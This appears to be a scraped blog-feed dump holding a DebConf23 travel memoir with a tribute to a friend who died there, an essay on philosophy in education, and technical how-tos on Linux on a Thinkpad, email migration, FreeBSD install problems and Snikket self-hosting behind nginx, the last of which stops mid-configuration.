sustainable solutions for self-hosting.\nMy friend Suresh - who is enthusiastic about Debian and free software - wanted to attend the DebConf as well. When the registration started, I reminded him about applying. We landed in Kochi on the 28th of August 2023 during the festival of Onam. We celebrated Onam in Kochi, had a trip to Wayanad, and returned to Kochi. On the evening of the 3rd of September, we reached the venue - Four Points Hotel by Sheraton, at Infopark Kochi, Ernakulam, Kerala, India.\nHotel overview\nThe hotel had 14 floors, and featured a swimming pool and gym (these were included in our package). The hotel gave us elevator access for only our floor, along with public spaces like the reception, gym, swimming pool, and dining areas. The temperature inside the hotel was pretty cold and I had to buy a jacket to survive. Perhaps the hotel was in cahoots with winterwear companies? :)\nFour Points Hotel by Sheraton was the venue of DebConf23, photo by rmb\n\n\n\n\nPhoto of the pool. Photo credits: Andreas Tille.\n\n\n\n      \nView from the hotel window.\nMeals\nOn the first day, Suresh and I had dinner at the eatery on the third floor. At the entrance, a member of the hotel staff asked us about how many people we wanted a table for. 
I told her that it’s just the two of us at the moment, but (as we are attending a conference) we might be joined by others. Regardless, they gave us a table for just two. Within a few minutes, we were joined by Alper from Turkey and urbec from Germany. So we shifted to a larger table…but then we were joined by even more people, so we were busy adding more chairs to our table. urbec had already been in Kerala for the past 5-6 days and was, on one hand, very happy already with the quality and taste of bananas in Kerala…and on the other, rather afraid of the spicy food :)\nTwo days later, the lunch and dinner were shifted to the All Spice Restaurant on the 14th floor, but the breakfast was still served at the eatery. Since the eatery (on the 3rd floor) had greater variety of food than the other venue, this move made breakfast the best meal for me and many others. Many attendees from outside India were not accustomed to the “spicy” food. It is difficult for locals to help them, because what we consider mild can be spicy for others. It is not easy to satisfy everyone at the dining table, but I think the organizing team did a very good job in the food department. (That said, it didn’t matter for me after a point, and you will know why.) The pappadam were really good, and I liked the rice labelled “Kerala rice”. I actually brought that exact rice and pappadam home during my last trip to Kochi and everyone at my home liked it too (thanks to Abhijit PA). I also wished to eat all types of payasams from Kerala and this really happened (thanks to Sruthi who designed the menu). Every meal had a different variety of payasam and it was awesome, although I didn’t like some of them, mostly because they were very sweet. Meals were later shifted to the ground floor (taking away the best breakfast option which was the eatery).\nThis place served as lunch and dinner place and later as hacklab during debconf. Photo credits: Bilal\n\nThe excellent Swag Bag\nThe DebConf registration desk was at the second floor. We were given a very nice swag bag. They were available in multiple colors - grey, green, blue, red - and included an umbrella, a steel mug, a multiboot USB drive by Mostly Harmless, a thermal flask, a mug by Canonical, a paper coaster, and stickers. It rained almost every day in Kochi during our stay, so handing out an umbrella to every attendee was a good idea.\nPicture of the awesome swag bag given at DebConf23. Photo credits: Ravi Dwivedi\n\nA gift for Nattie\nDuring breakfast one day, Nattie (Belgium) expressed the desire to buy a coffee filter. The next time I went to the market, I bought a coffee filter for her as a gift. She seemed happy with the gift and was flattered to receive a gift from a young man :)\nBeing a mentor\nThere were many newbies who were eager to learn and contribute to Debian. So, I mentored whoever came to me and was interested in learning. I conducted a packaging workshop in the bootcamp, but could only cover how to set up the Debian Unstable environment, and had to leave out how to package (but I covered that in my talk). Carlos (Brazil) gave a keysigning session in the bootcamp. Praveen was also mentoring in the bootcamp. I helped people understand why we sign GPG keys and how to sign them. I planned to take a workshop on it but cancelled it later.\nMy talk\nMy Debian packaging talk was on the 10th of September, 2023. 
I had not prepared slides for my Debian packaging talk in advance - I thought that I could do it during the trip, but I didn’t get the time…so I prepared them on the day before the talk. Since it was mostly a tutorial, the slides did not need much preparation. My thanks to Suresh, who helped me with the slides and made it possible to complete them in such a short time frame.\nMy talk was well-received by the audience, going by their comments. I am glad that I could give an interesting presentation.\nMy presentation photo. Photo credits: Valessio\n\nVisiting a saree shop\nAfter my talk, Suresh, Alper, and I went with Anisa and Kristi - who are both from Albania, and have a never-ending fascination for Indian culture :) - to buy them sarees. We took autos to Kakkanad market and found a shop with a great variety of sarees. I was slightly familiar with the area around the hotel, as I had been there for a week. Indian women usually don’t try on sarees while buying - they just select the design. But Anisa wanted to put one on and take a few photos as well. The shop staff did not have a trial saree for this purpose, so they took a saree from a mannequin. It took about an hour for the lady at the shop to help Anisa put on that saree…but you could tell that she was in heaven wearing it, and she bought it immediately :) Alper also bought a saree to take back to Turkey for his mother. Suresh and I wanted to buy kurtas that would go well with the mundus we already had, but we could not find anything to our liking.\nSelfie with Anisa and Kristi. Photo credits: Anisa.\n\nCheese and Wine Party\nOn the 11th of September we had the Cheese and Wine Party, a tradition at every DebConf. I brought Kaju Samosa and Nankhatai from home. Many attendees expressed their appreciation for the samosas. During the party, I was with Abhas and had a lot of fun. Abhas brought packets of paan and served them at the Cheese and Wine Party. We discussed interesting things and ate burgers. But due to the restrictive alcohol laws in the state, it was less fun compared to the previous DebConfs - you could only drink alcohol served by the hotel in public places. If you bought your own alcohol, you could only drink in private places (such as in your room, or a friend’s room), but not in public places.\nMe helping with the Cheese and Wine Party.\n\nParty at my room\nLast year, Joenio (Brazilian) brought pastis from France, which I liked. He brought the same alcoholic drink this year too. So I invited him to my room after the Cheese and Wine party to have pastis. My idea was to share it with my roommate Suresh and Joenio. But then we permitted Joenio to bring as many people as he wanted…and he ended up bringing some ten people. Suddenly, the room was crowded. I was having a good time at the party, serving them the snacks given to me by Abhas. The news of an alcohol party in my room spread like wildfire. Soon there were so many people that the AC became ineffective and I found myself sweating.\nI left the room and roamed around the hotel for some fresh air. I came back after about 1.5 hours - for the most part, I was sitting on the ground floor with TK Saurabh. And then I met Abraham near the gym (which was my last meeting with him). I came back to my room at around 2:30 AM. Nobody seemed to have realized that I was gone. They were thanking me for hosting such a good party. A lot of people left at that point and the remaining people were playing songs and dancing (everyone was dancing all along!).
I had no energy left to dance and join them. They left around 03:00 AM. But I am glad that people enjoyed partying in my room.\nThis picture was taken when there were few people in my room for the party.\n\nSadhya Thali\nOn the 12th of September, we had a sadhya thali for lunch. It is a vegetarian thali served on a banana leaf on the eve of Thiruvonam. It wasn’t Thiruvonam on this day, but we got a special and filling lunch. The rasam and payasam were especially yummy.\nSadhya Thali: A vegetarian meal served on a banana leaf. Payasam and rasam were especially yummy! Photo credits: Ravi Dwivedi.\n\nSadhya thali being served at DebConf23. Photo credits: Bilal\n\nDay trip\nOn the 13th of September, we had a daytrip. I chose the houseboat daytrip in Alleppey. Suresh chose the same, and we registered for it as soon as registration opened. This was the most sought-after daytrip among the DebConf attendees - around 80 people registered for it.\nOur bus was set to leave at 9 AM on the 13th of September. Suresh and I woke up at 8:40 and hurried to get to the bus in time. It took two hours to reach the venue where we got the houseboat.\nThe houseboat experience was good. The trip featured some good scenery. I got to experience the renowned Kerala backwaters. We were served food on the boat. We also stopped at a place and had coconut water. By evening, we came back to the place where we had boarded the boat.\nGroup photo of our daytrip. Photo credits: Radhika Jhalani\n\nA good friend lost\nWhen we came back from the daytrip, we received news that Abraham Raji was involved in a fatal accident during a kayaking trip.\nAbraham Raji was a very good friend of mine. On my Albania-Kosovo-Dubai trip last year, he was my roommate at our Tirana apartment. I roamed around Dubai with him, and we had many discussions during DebConf22 Kosovo. He was the one who took the photo of me on my homepage. I also met him at MiniDebConf22 Palakkad and MiniDebConf23 Tamil Nadu, and went to his flat in Kochi this year in June.\nWe had many projects in common. He was a Free Software activist and was the designer of the DebConf23 logo, in addition to those for other Debian events in India.\nA selfie in memory of Abraham.\n\nWe were all fairly shocked by the news. I was devastated. Food lost its taste, and it became difficult to sleep. That night, Anisa and Kristi cheered me up and gave me company. Thanks a lot to them.\nThe next day, Joenio also tried to console me. I thank him for doing a great job. I thank everyone who helped me in coping with the difficult situation.\nOn the next day (the 14th of September), the Debian project leader Jonathan Carter addressed the conference and announced the news officially. The Debian project also mentioned it on their website.\nAbraham was supposed to give a talk, but following the incident, all talks were cancelled for the day. The conference dinner was also cancelled.\nAs I write, 9 days have passed since his death, but even now I cannot come to terms with it.\nVisiting Abraham’s house\nOn the 15th of September, the conference ran two buses from the hotel to Abraham’s house in Kottayam (a 2-hour ride). I hopped on the first bus and my mood was not very good. Evangelos (Germany) was sitting opposite me, and he began conversing with me. The distraction helped and I was back to normal for a while. Thanks to Evangelos, as he supported me a lot on that trip. He was also very impressed by my use of the StreetComplete app, which I was using to edit OpenStreetMap.\nIn two hours, we reached Abraham’s house.
I couldn’t control myself and burst into tears. I went to see the body. I met his family (mother, father and sister), but I had nothing to say and I felt helpless. Owing to the loss of sleep and appetite over the past few days, I had no energy, and didn’t think it was a good idea for me to stay there. I went back on the bus after an hour and had lunch at the hotel. I withdrew my talk scheduled for the 16th of September.\nA Japanese gift\nI got a nice Japanese gift from Niibe Yutaka (Japan) - a folder for keeping papers, with ancient Japanese manga characters on it. He said he felt guilty because he had swapped his talk slot with mine, which moved my talk from the 12th of September to the 16th - the talk I later withdrew.\nThanks to Niibe Yutaka (the person on your right) from Japan (FSIJ), who gave me a wonderful Japanese gift during DebConf23: a folder to keep pages in, with ancient Japanese manga characters printed on it. I realized I immediately needed that :)\n\nThis is the Japanese gift I received.\n\nGroup photo\nOn the 16th of September, we had a group photo. I am glad that this year I was more clearly visible in this picture than in the DebConf22 one.\nVolunteer work and talks attended\nI attended the training session for the video team and worked as a camera operator. The Bits from the DPL talk was nice. I enjoyed Abhas’ presentation on home automation. He basically demonstrated how he liberated Internet-enabled home devices. I also liked Kristi’s presentation on ways to engage with the GNOME community.\nBits from the DPL. Photo credits: Bilal\n\nKristi on the GNOME community. Photo credits: Ravi Dwivedi.\n\nAbhas' talk on home automation. Photo credits: Ravi Dwivedi.\n\nI also attended the lightning talks on the last day. Badri, Wouter, and I gave a demo on how to register on the Prav app. Prav got a fair share of advertising during the last few days.\nI was roaming around with a QR code on my T-shirt for downloading Prav.\n\nDeparture day\nThe 18th of September was the day of departure. Badri slept in my room and left early in the morning (06:30 AM). I dropped him off at the hotel gate. The breakfast was at the eatery (3rd floor) again.\nI had an 8 PM flight from Kochi to Delhi, for which I took a cab with Rhonda (Austria), Michael (Nigeria) and Yash (India). We were joined by other DebConf23 attendees at the Kochi airport, where we took another selfie.\nRuchika (taking the selfie) and, from left to right: Yash, Joost (Netherlands), me, Rhonda\n\nJoost and I were on the same flight, and we sat next to each other. He then took a connecting flight from Delhi to the Netherlands, while I went with Yash to the New Delhi Railway Station, where we took our respective trains. I reached home on the morning of the 19th of September, 2023.\nJoost and me going to Delhi. Photo credits: Ravi.\n\nBig thanks to the organizers\nDebConf23 was hard to organize - strict alcohol laws, weird hotel rules, the death of a close friend (almost a family member), and a scary notice from the immigration bureau. The people on the team are my close friends and I am proud of them for organizing such a good event.\nNone of this would have been possible without the organizers, who put in more than a year of voluntary effort to produce this. In the meantime, many of them had also organized local events in the lead-up to DebConf. Kudos to them.\nThe organizers also tried their best to get clearance for countries not approved by the ministry. I am also sad that people from China, Kosovo, and Iran could not join.
In particular, I feel bad for the people from Kosovo who wanted to attend but could not (as India does not consider their passport a valid travel document), considering how well we Indians were received in their country last year.\nNote about myself\nI am writing this on the 22nd of September, 2023. It took me three days to put up this post - it was one of the most tragic and hardest posts for me to write. I literally had to force myself to write it. I have still not recovered from the loss of my friend. Thanks a lot to all those who helped me.\nPS: Credits to contrapunctus for making grammar, phrasing, and capitalization changes.",[],{"slug":1131,"title":1132,"link":1133,"pubDate":1134,"contentSnippet":1135,"tags":1136,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"cosmos","Shores of the cosmic ocean","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fcosmos","Fri, 15 Sep 2023 00:00:00 GMT","In this piece, I reflect on our place in the vast universe — Earth as a tiny “shore” in the ocean of the cosmos, and how human curiosity drives us to explore what lies beyond our horizon.",[],{"slug":1138,"title":1139,"link":1140,"pubDate":1141,"contentSnippet":1142,"tags":1143,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-15","Emerging from dotemacs bankruptcy the hard way: integrating the IDE (feat. Clojure(Script))","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Femerging-from-dotemacs-bankruptcy-ide-experience\u002Findex.html","Thu, 07 Sep 2023 00:00:00 +0000","The one in which we design a rich Integrated Development Environment (IDE) experience, using Clojure as our muse. Featuring Language Server Protocol (lsp-mode + clojure-lsp), clojure-mode, cider, and more! Buckle up and get a coffee.",[227,1144,457,1108,52],"emacs",{"slug":1146,"title":1147,"link":1148,"pubDate":1149,"contentSnippet":1150,"tags":1151,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"education-system-and-youth","The Cobwebs of Indian Education System","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Feducation-system-and-youth\u002F","Wed, 30 Aug 2023 14:20:07 +0000","I write this as India has successfully landed on the Moon and is carrying out its Chandrayaan-3 mission. This is a very proud moment for each and every Indian. India has become the first country to land in the Moon’s south polar region, and I’d like to congratulate all the people who were involved in this mission! Anyway, I stumbled upon this old essay from 1999, titled “INDIAN TALENT CAUGHT IN THE COBWEBS”. It mentions how Indian society in general resists change.",[],{"slug":1153,"title":1154,"link":1155,"pubDate":1156,"contentSnippet":1157,"tags":1158,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"04-philosophy-should-be-part-of-edu-system-html","Why philosophy should be part of the education system","https:\u002F\u002Faryak.me\u002Fblog\u002F04-philosophy-should-be-part-of-edu-system.html","Sat, 19 Aug 2023 12:39:45 +0000","I was recently reading the essay On Liberty by John Stuart Mill, and I was very intrigued by some of the points brought up by the book.\nThis led me to think again about something I have been pondering on and off for ages: the place of philosophy in the educational system.\nThe problem\nI’ll start with the problem.
To be honest, this generation is extremely apolitical and politically inactive.\nAll they care about is getting good marks, passing 10th\u002F12th and getting a good college\u002Fjob, while ignoring the big and important question: the state of our nation.\nWhen no one cares about the nation, asatyamev hi jayate (injustice alone will prevail), for there is nobody to keep a check on the government.\nEvery person’s goal in life is to serve themselves. Me first, everything secondary. This is how humans work.\nThe government is meant to mediate this, but it’s not a bulletproof entity; it’s made of people, whose primary goal is to serve themselves.\nThis is why we need someone to keep the government in check, and anti-intellectualism and aloofness from politics do not help.\nThis, I feel, is exacerbated by the education system, especially here, which encourages rote learning.\nThe state of the current education system\nThis is especially bad with social studies, where it is important to be opinion-based, not “I just memorized this chapter and can get 100 in tomorrow’s exam”.\nI guess this could apply to the sciences, mathematics etc., but it is even more important in the social sciences and humanities.\nSocial studies must be about opinions: what you think about an issue, who is in the right and who is in the wrong according to you, with multiple sources to learn from.\nPeople should be marked based on the intellectual quality of the answer, not on how “politically correct” or similar to the textbook the answer is.\nHere is where philosophy plays an important role.\nWhile social studies only covers laws, history and generally how our current system came to be, philosophy questions the basic theory.\nPhilosophy awakens the intellect and makes people think critically.\nIt encourages people to go into deep thought and intellectual discussion, which benefits them mentally and society at large, as we get more intelligent people.\nThis encouragement, which used to be prevalent in the ancient times of the Gurukuls, has been effectively wiped out by the advent of the structured educational system.\nMy ideas for how philosophy could be implemented in education\nPhilosophy is a vast and varied subject.\nI would say extracts from philosophical texts of the big 4 traditions (Western, Indian, Chinese, Islamic) on a specific topic - suitable, of course, for the students’ grade - should be given to students, and they should be asked to comment on what they think about each.\nIn my opinion, everything should be marked based on the intellect of the answer, and when marks are deducted for “wrong-think”, students should be able to appeal to a board set up to adjudicate and coordinate with schools about these kinds of marking conflicts.\nThe “untouchable” subjects\nThere are many subjects that are untouchable in any normal debate, be it caste, morality, religion etc.\nThis is BAD and leads to the forcing of opinions and a general lack of intellectualism around these topics.\nYou cannot and should not take a blindly-following approach to anything. Question every single thing you have to do, be it rhetorical or directed towards someone else.\nThe law\nThe law should be more liberal when it comes to “wrong-think”. 
Speech should be allowed as long as it does not incite or promote violence.\nI know “incite violence” is vague as hell, and that is of course because all sorts of things can make people mad.\nA small social media post about something inciting can cause more harm than someone saying extremely inciting\u002Fdangerous things to even a big audience.\n“Hate speech” cannot be regulated, and the intention behind something cannot easily be made out.\nTo be frank, I don’t have any ideas about this. Maybe a committee to decide what constitutes hate speech and what does not, but then there are of course biases.\nIf you go with a simple “if there is violence due to your post we arrest you”, you risk arresting people whose post unintentionally incited the same.\nBut, at the end of the day, the law should be more accommodating of free thinking and intellectual discussion, as long as, of course, it doesn’t incite violent acts.\nSocietal stuff\nPeople are also moulded more and more into non-individualistic robots, who all share the same happiness and the same opinions.\nPeople like something just because others like it, and if they don’t like it they are treated like outcasts from society.\nPeople have no individualistic goals in life, just the standard “getting good marks, passing 10th\u002F12th and getting a good college\u002Fjob”.\nWhile these are also extremely important, we need to stress the importance of a life where people aren’t just robots who do what they are told to do (or NPCs, as the zoomers call them).\nThis could be lessened by philosophy, which instills critical thinking in the minds of those who read it.\nI should have published this on Independence Day, since a lot of these were ponderings about Indian independence and what it gave us Indians, but, well, procrastination :)\nI know this is a bit rambly but I hope you get the point :P",[1159],"2023\u002F08\u002F19\u002F6",{"slug":1161,"title":1162,"link":1163,"pubDate":1164,"contentSnippet":1165,"tags":1166,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"03-e14-linux-html","Linux on the Thinkpad E14 G5 AMD","https:\u002F\u002Faryak.me\u002Fblog\u002F03-e14-linux.html","Wed, 16 Aug 2023 12:39:45 +0000","I recently got a Thinkpad E14 Gen 5 with a 7th gen Ryzen 5 to replace my Acer Aspire 7.\nOf course I wanted to replace the default Windows with Linux, but I was too lazy to reinstall and hence just put my old NVMe SSD in the laptop, thanks to the availability of 2 M.2 slots.\nBefore this I had to disable Secure Boot in the BIOS, which I did along with a few other “important” changes (which I’ll cover later).\nPast this, most things worked out of the box after removing my old Nvidia drivers. Ryzen is really good on Linux :P\nHowever, 2 things didn’t work correctly: the fingerprint sensor and the WiFi card.\nRealtek WiFi\nAfter the initial setup, my Realtek WiFi card was having frequent disconnection issues. It would suddenly just stop transmitting data, and the fix was to reconnect to the WiFi network.\nAnother issue is that the Realtek WiFi card only works with kernels 6.2+.
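(You can check which kernel you are running with uname -r. Ubuntu 22.04, for instance, shipped with a 5.15 kernel at release, which would explain the card misbehaving on its stock ISO, as noted next.)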
This wasn’t an issue for me as a Debian Sid user, but when I first tested compatibility with an Ubuntu 22.04 ISO before adding my drive, it was pretty weird\u002Fconfusing.\nAfter a bit of searching, I figured out that the random disconnections were due to NetworkManager’s randomized MAC addresses.\nTo fix this, I just had to append the following to the NetworkManager.conf file:\n[device]\nwifi.scan-rand-mac-address=no\nGoodix Fingerprint\nI had written the fingerprint sensor off for good, until I discovered through one of the manuals I was searching that Lenovo provides drivers for it.\nOriginally I didn’t find anything, since the driver page for my model didn’t list Linux, but after a bit more searching, I stumbled across this support page that gave links to drivers.\nSince I run Debian Testing, and it’s mostly compatible with what Ubuntu has, I tried just installing libfprint-2-2 normally and then the driver’s deb, but the deb refused to install since it needed libfprint-2-tod (a fork of libfprint with support for TOD\u002Ftouch-based fingerprint readers).\nI tried installing the deb from the Ubuntu repos and then installing the driver, which succeeded, but didn’t make the device work.\nLater, I installed Ubuntu 22.04 on a secondary partition to check if it worked on Ubuntu, which it did.\nOne thing I noticed, however, was that it used a PPA instead of the regular libfprint(-tod) from the Canonical repos.\nThen, I tried installing the libfprint and libfprint-tod debs from that PPA and the Goodix deb from Lenovo, and after a reboot, everything worked!\nOnce it was up, I installed fprintd and libpam-fprintd, at which point I ran fprintd-enroll and fprintd-verify.\nAfter these succeeded, I ran pam-auth-update --enable fprintd. This made fprintd work for PAM stuff like sudo and TTY logins.\nWith this, the last remaining non-working feature of my Thinkpad was working as well :D\nThe BIOS\nOnce I got my Thinkpad, basically the first thing I did was tweak the BIOS.\nGetting into the BIOS is dead simple compared to other laptops: just press Enter (which it tells you to during bootup) and it will take you to a menu, from which you can go to the BIOS with F1.\nI was pleasantly surprised to see a modern BIOS, with touchpad support. Coming from laptops which only had blue-and-white BIOSes and barely any tweaks, this was a welcome upgrade :)\nThe first thing to disable was Secure Boot. It was in the Security section of the BIOS and was pretty easy to disable.\nThen, I permanently disabled some enterprise spyware utility (UPDATE: it was called Absolute, under Security).\nThere was also Lenovo Cloud Services in Config -> Network, which I of course disabled.\nWhile in Security, I disabled Enhanced Windows Biometric Security (in Virtualization) and Microsoft Device Guard.\nAnd that’s it for now; I’ll update this blog post if I face any other issues or discover other stuff.
Thanks for sticking around :)\nIf you have any questions, feel free to contact me!",[1167],"2023\u002F08\u002F16\u002F3",{"slug":1169,"title":1170,"link":1171,"pubDate":1172,"contentSnippet":1173,"tags":1174,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"my-steps-transfer-mail-from-gandi","My Steps: Switching e-mail provider from gandi.net","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fmy-steps-transfer-mail-from-gandi\u002F","Tue, 15 Aug 2023 08:52:43 +0530","Earlier this year, gandi.net’s ownership changed and it was acquired by Total Webhosting Solutions. My domain and email were both hosted by this provider. Since I didn’t agree with the ownership change, I decided to switch my email provider. After discussing with Sahil, Snehal, Praveen, and Nilesh, I shortlisted two email providers to choose from for ravi at ravidwivedi.in. One was purelymail and the other was mailbox.org. Since purelymail ($10 per year) was cheaper than mailbox (€36 per year), I decided to give it a try. If this does not work out, I thought, I will switch to mailbox later.\nBelow are the steps I followed. The steps will be the same in principle for any other provider you would like to switch to, so this guide should be helpful even if you want to switch to an email provider other than purelymail.\nBe sure to read the docs of the email provider you want to switch to in addition to this guide.\nStep 1: Create an account on purelymail.com\nFirst, I signed up on purelymail and created an account (like something@purelymail.com). They charged $10 upfront for creating this account.\nStep 2: Add your domain to your purelymail account\nSign in to your purelymail account and click on the Domains section at the top, and you will see a page like the screenshot below:\nClick on ‘Add new domain’ as in the above screenshot.\nStep 3: Enter domain name\nEnter your domain name (like example.com) on the page you got after clicking ‘Add new domain’ in the last step.\nStep 4: Create an MX record\nCreate a new MX record in your gandi.net portal, or whichever domain registrar you bought your domain from. Use your mail provider’s docs to obtain these values and plug them in.\nType\n    Host\n    Value\n  \nMX\n    (Empty)\n    mailserver.purelymail.com. (this is a sample value; you should put the value recommended by your email provider. The dot at the end of the value is important.)\n  \nStep 5: Add an SPF record\nCreate a new SPF record as you did in Step 4. Again, use your mail provider’s docs to obtain these values and plug them in.\nType\n    Host\n    Value\n  \nTXT\n    (Empty)\n    v=spf1 include:_spf.purelymail.com ~all (this is a sample value; you should put the value recommended by your email provider)\n  \nStep 6: Add a TXT record to prove that you own the domain\nI am not sure if this step is necessary for other email providers or even for purelymail, but since it was recommended by their docs I added this value from my gandi.net portal. It is a TXT record like this:\nType\n    Host\n    Value\n  \nTXT\n    (Empty)\n    Redacted\n  \nStep 7: Add DKIM signatures\nA DKIM signature lets the email receiver verify whether the email has indeed been sent by the domain owner. It is highly recommended. You can read more about DKIM signatures here. Read your email provider’s docs and put in the respective values.\nBelow is a sample taken from my steps:\nType\n    Host\n    Value\n  \nCNAME\n    purelymail1._domainkey\n    key1.dkimroot.purelymail.com. 
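\n(Once the DNS change has propagated, a quick query such as dig +short CNAME purelymail1._domainkey.yourdomain.com - with yourdomain.com standing in for your actual domain - should print the target value shown above.)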
\nNote: the dot at the end is important.\nI added two other CNAME records in this step, as suggested by the purelymail docs.\nStep 8: Add DMARC record\nCreate a DMARC record (check your provider’s docs for the values) just as you created the other records in the previous steps.\nType\n    Host\n    Value\n  \nCNAME\n    check your docs\n    check your docs\n\nStep 9: Check your DNS records\nNow we verify whether our records point to our new provider. The purelymail portal has a ‘Check DNS records’ button which can check whether the records you entered are correct. It takes a few minutes, and sometimes a few hours, for the DNS records to propagate.\nPurelymail portal showing all DNS records were entered correctly.\n\nStep 10: Create account on new provider\nAfter all the records have been correctly added, create an account on purelymail by clicking the ‘Users’ button at the top and creating a new user. I created the ravi@ user on my domain from there.\nStep 11: Import data from gandi.net email\npurelymail has an option to import data - like emails, calendar and address book - from your previous account. Use that option to import emails from gandi.net. Or you can use IMAP to log in to your new provider in an email client like Thunderbird and manually copy all the emails to your new account.\nStep 12: Delete gandi.net email and DNS records\nDelete the gandi.net email from the gandi.net portal and remove all the previous records which point to gandi.net for email (like MX, SPF, DKIM).\nYou are done. Enjoy your new email provider, and let me know which one you switched to and why :-)",[],{"slug":1183,"title":1184,"link":1185,"pubDate":1186,"contentSnippet":1187,"tags":1188,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"freebsd-install-issues","FreeBSD Install: Hiccups and Issues","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffreebsd-install-issues\u002F","Mon, 31 Jul 2023 19:44:19 +0530","I installed FreeBSD 13.2 with KDE today on my Dell Inspiron 5482. I have heard good things about FreeBSD, primarily as an operating system for servers, but the project claims that it works well for desktop users as well. So, I thought I would give it a try. There were some things I had to figure out during the installation, which I will note in this post for future reference. I also had to uninstall FreeBSD within hours of installation due to issues I faced, so it didn’t go well. I am going to list the issues here, along with how I figured some things out.\nRegdomain selection during install\nDuring install, the installer asked me to select a regdomain. I figured out that the default option – FCC\u002FUnited States of America – worked for me.\nXorg didn’t start up\nPost installation, I installed xorg in FreeBSD and added a file \u002Fusr\u002Flocal\u002Fetc\u002FX11\u002Fxorg.conf.d\u002F20-intel.conf as per example 1 in the official handbook.
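For reference, that handbook example is a small Device section along these lines (a sketch - check the handbook for the exact text for your card):\nSection \"Device\"\n    Identifier \"Card0\"\n    Driver     \"intel\"\nEndSection\n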
But the startx command wasn’t working, so I ran the command:\nXorg -configure\nand then\ncp \u002Froot\u002Fxorg.conf.new \u002Fusr\u002Flocal\u002Fetc\u002FX11\u002Fxorg.conf, followed by editing the file \u002Fusr\u002Flocal\u002Fetc\u002FX11\u002Fxorg.conf and changing the Driver value to \"i915kms\" under the “Device” section.\nManaging brightness during startup\nWhen using FreeBSD, my keyboard’s brightness buttons were not working. To decrease brightness, I used the preinstalled backlight utility:\nbacklight -f \u002Fdev\u002Fbacklight\u002Fbacklight0 10\nCredits to this answer.\nI couldn’t get the brightness to be automatically low at startup. It was at 100% every time I booted.\nCrashed frequently\nThe system crashed frequently and wasn’t stable at all. It automatically rebooted after some time. I tried to debug and fix it, but couldn’t. So, for now, I have uninstalled FreeBSD.\nIf you know any of the fixes, please let me know.",[],{"slug":1190,"title":1191,"link":1192,"pubDate":1193,"contentSnippet":1194,"tags":1195,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"self-host-snikket-behind-nginx","My Steps: Self hosting Snikket behind nginx","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fself-host-snikket-behind-nginx\u002F","Wed, 26 Jul 2023 01:53:54 +0530","Snikket is server-side software for XMPP chat communication. This guide is for anyone who wants to set up a Snikket server behind nginx. The operating system on the server is Debian in my case. My guide is based on the official guide.\nRun all the commands mentioned below as root.\nPoint your domain to the server’s IP address\nInstall curl on Debian:\napt install curl\n\nNow run:\ncurl -4 ifconfig.co\n\nThe output of the previous command is the IP address of the server you are using.\nCreate an A record corresponding to the domain you want to use. Since I have the domain ravidwivedi.in, I will deploy my chat server at the subdomain chat.ravidwivedi.in.\nCreate CNAME records for groups.chat.ravidwivedi.in and share.chat.ravidwivedi.in so that they point to chat.ravidwivedi.in\nOpen required ports\nOpen the required ports if you are behind a firewall like ufw. The official Snikket docs list which ones you have to allow.\nDocker and snikket configuration\nInstall the docker and docker-compose packages on your server. The commands for Debian are:\napt install docker docker-compose\n\nSnikket configuration\nCreate a Snikket config file and download the docker-compose.yml file prepared by the Snikket project.\nmkdir \u002Fetc\u002Fsnikket\ncd \u002Fetc\u002Fsnikket\ncurl -o docker-compose.yml https:\u002F\u002Fsnikket.org\u002Fservice\u002Fresources\u002Fdocker-compose.beta.yml\n\nCreate a file named snikket.conf in the \u002Fetc\u002Fsnikket directory with the following contents (replace the appropriate fields according to your domain and email):\n# The primary domain of your Snikket instance\nSNIKKET_DOMAIN=chat.ravidwivedi.in\n\n# An email address where the admin can be contacted\n# (also used to register your Let's Encrypt account to obtain certificates)\nSNIKKET_ADMIN_EMAIL=your-email@ravidwivedi.in\n\nNginx config and HTTPS\nFor the nginx setup, we follow the Snikket project’s reverse proxy docs. We will also set up HTTPS certificates using certbot.
Let’s install nginx and certbot:\napt install nginx python3-certbot-nginx\n\nObtain certificates for all the subdomains\ncertbot certonly --standalone -d share.chat.ravidwivedi.in -d groups.chat.ravidwivedi.in  -d chat.ravidwivedi.in\n\nThe output for me was:\nSuccessfully received certificate.\nCertificate is saved at: \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Ffullchain.pem\nKey is saved at:         \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Fprivkey.pem\nThis certificate expires on 2023-10-23.\nThese files will be updated when the certificate renews.\nCertbot has set up a scheduled task to automatically renew this certificate in the background.\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nIf you like Certbot, please consider supporting our work by:\n * Donating to ISRG \u002F Let's Encrypt:   https:\u002F\u002Fletsencrypt.org\u002Fdonate\n * Donating to EFF:                    https:\u002F\u002Feff.org\u002Fdonate-le\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nWe want nginx to listen at ports 80 and 443. So, let’s direct Snikket to bind to ports 5080 and 5443 to avoid conflict with nginx. To do this, add these lines to \u002Fetc\u002Fsnikket\u002Fsnikket.conf:\nSNIKKET_TWEAK_HTTP_PORT=5080\nSNIKKET_TWEAK_HTTPS_PORT=5443\n\nNow create a file \u002Fetc\u002Fnginx\u002Fsites-available\u002Fchat.ravidwivedi.in and add the following contents to it, followed by replacing ravidwivedi.in with your domain name and specifying correct ssl_certificate path to the location of your certificates.\nserver {\n  # Accept HTTP connections\n  listen 80;\n  listen [::]:80;\n\n  server_name chat.ravidwivedi.in;\n  server_name groups.chat.ravidwivedi.in;\n  server_name 